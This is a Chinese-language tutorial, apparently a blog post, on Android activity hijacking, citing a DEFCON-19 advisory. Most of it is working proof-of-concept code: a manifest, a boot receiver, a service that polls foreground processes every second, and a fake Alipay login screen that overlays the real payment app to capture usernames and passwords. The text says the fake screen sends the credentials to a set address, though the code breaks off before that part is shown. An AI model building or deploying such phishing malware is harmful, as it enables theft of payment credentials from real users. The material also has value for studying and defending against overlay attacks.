android安全-activity劫持

一、activity劫持简介

DEFCON-19上公布的,原文见
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-008.txt

android运行时,会在很多activity中进行切换,它自身维护着一个activity的历史栈,用于在用户点击back时,恢复前一个activity,栈顶指向当前显示的activity。

原文如下:

http://developer.android.com/guide/topics/fundamentals/tasks-and-back-stack.html

在我们使用intent开启activity时,intent有一个选项FLAG_ACTIVITY_NEW_TASK,可以使得这个activity位于栈顶

http://developer.android.com/reference/android/content/Intent.html#FLAG_ACTIVITY_NEW_TASK

如果我们注册一个receiver,响应android.intent.action.BOOT_COMPLETED,使得开启启动一个service;这个service,会启动一个计时器,不停枚举当前进程中是否有预设的进程启动,如果发现有预设进程,则使用FLAG_ACTIVITY_NEW_TASK启动自己的钓鱼界面,截获正常应用的登录凭证。

 

二、实例

androidmanifest.xml

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
xml version = "1.0" encoding = "utf-8" ?>
< manifest xmlns:android = "http://schemas.android.com/apk/res/android"
       package = "com.xiaod.Hijack"
       android:versionCode = "1"
       android:versionName = "1.0" >
     < uses-sdk android:minSdkVersion = "3" />
     < uses-permission android:name = "android.permission.RECEIVE_BOOT_COMPLETED" > uses-permission >
     < uses-permission android:name = "android.permission.INTERNET" />
     < application android:icon = "@drawable/icon" android:label = "@string/app_name" android:name = ".HijackApplication" >
         < activity android:name = ".HijackActivity"
                   android:label = "@string/app_name" >
             < intent-filter >
                 < action android:name = "android.intent.action.MAIN" />
                 < category android:name = "android.intent.category.LAUNCHER" />
             intent-filter >
         activity >
         < activity android:name = ".AlipayLogin" android:noHistory = "true" android:windowSoftInputMode = "adjustResize" />
       < service android:name = ".HijackService" android:label = "Hijack Service" >
             < intent-filter >
                 < action android:name = "com.xiaod.Hijack.service.Hijack" />
             intent-filter >
         service >
         < receiver
         android:name = ".HijackReceiver"
         android:enabled = "true"
         android:exported = "true"
         android:label = "Hijack Receiver" >
             < intent-filter >
                 < action android:name = "android.intent.action.BOOT_COMPLETED" />
             intent-filter >
         receiver >
     application >
manifest >

HijackReceiver.java 用于开机启动HijackService

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
package com.xiaod.Hijack;
 
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.util.Log;
 
public class HijackReceiver extends BroadcastReceiver{
 
     @Override
     public void onReceive(Context context, Intent intent) {
         if (intent.getAction().equals( "android.intent.action.BOOT_COMPLETED" )) {
             Intent serviceIntent = new Intent(context, HijackService. class );
             context.startService(serviceIntent);
         }
     }
}

HijackService.java用于判断正常应用是否启动,如果启动则开启劫持activity

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
package com.xiaod.Hijack;
 
import java.util.HashMap;
import java.util.List;
import java.util.Timer;
import java.util.TimerTask;
 
import android.app.ActivityManager;
import android.app.ActivityManager.RunningAppProcessInfo;
import android.app.Service;
import android.content.Context;
import android.content.Intent;
import android.os.IBinder;
import android.util.Log;
 
public class HijackService extends Service{
     Timer mTimer = new Timer();
     //新建一个定时任务
     TimerTask mTimerTask = new TimerTask() {
         @Override
         public void run() {
             // TODO Auto-generated method stub
             //获取当前运行的进程列表
             ActivityManager activityManager = (ActivityManager) getSystemService( Context.ACTIVITY_SERVICE );
             List appProcesses = activityManager.getRunningAppProcesses();
 
             //枚举进程
             for (RunningAppProcessInfo appProcess : appProcesses) {
                 //如果APP在前台
                 if (appProcess.importance == RunningAppProcessInfo.IMPORTANCE_FOREGROUND) {
                     //APP是否在需要劫持的列表中
                     if (mVictims.containsKey(appProcess.processName)) {
                         if (((HijackApplication)getApplication()).getHasHijackStart() == false )
                         {
                             Intent dialogIntent = new Intent(getBaseContext(), mVictims.get(appProcess.processName));
                             //设置启动的activity位于栈顶
                             dialogIntent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
                             getApplication().startActivity(dialogIntent);
                             ((HijackApplication)getApplication()).setHasHijackStart( true );
                         }
                     }
                 }
             }
             Log.e( "HijackService_TimerTask" , "here" );
         }
 
     };
     HashMap> mVictims = new HashMap>();
     long delay = 1000 ;
     long period = 1000 ;
 
     @Override
     public void onStart(Intent intent, int startid) {
 
         //设置需要劫持的应用
         mVictims.put( "com.eg.android.AlipayGphone" , AlipayLogin. class );
         //开启计时任务
         mTimer.scheduleAtFixedRate(mTimerTask, delay, period);
     }
 
     @Override
     public IBinder onBind(Intent arg0) {
         // TODO Auto-generated method stub
         return null ;
     }
}

AlipayLogin.java 是伪造的界面,用于获取用户凭证并发送到指定地址,并返回正常应用

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
package com.xiaod.Hijack;
 
import java.util.ArrayList;
import java.util.List;
 
import org.apache.http.HttpResponse;
import org.apache.http.NameValuePair;
import org.apache.http.client.entity.UrlEncodedFormEntity;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.impl.client.DefaultHttpClient;
import org.apache.http.message.BasicNameValuePair;
import org.apache.http.protocol.HTTP;
 
import android.app.Activity;
import android.os.Bundle;
import android.view.View;
import android.view.View.OnClickListener;
import android.view.Window;
import android.widget.Button;
import android.widget.EditText;
 
public class AlipayLogin extends Activity {
     private Button mBtnLogin;
     private Button mBtnReg;
     private EditText mEdtUser;
     private EditText mEdtPwd;
     @Override
     public void onCreate(Bundle savedInstanceState) {
         super .onCreate(savedInstanceState);
         requestWindowFeature(Window.FEATURE_NO_TITLE);
         setContentView(R.layout.alipay_login);      
 
         mBtnLogin = (Button) findViewById(R.id.btn_login);
         mBtnReg = (Button) findViewById(R.id.btn_reg);
         mEdtUser = (EditText) findViewById(R.id.et_user);
         mEdtPwd = (EditText) findViewById(R.id.et_pwd);
 
         mBtnLogin.setOnClickListener( new OnClickListener() {
 
             @Override
             public void onClick(View v) {
                 // TODO Auto-generated method stub
                 sendInfo(mEdtUser.getText().toString(), mEdtPwd.getText().toString());
                 moveTaskToBack(

你可能感兴趣的:(Android)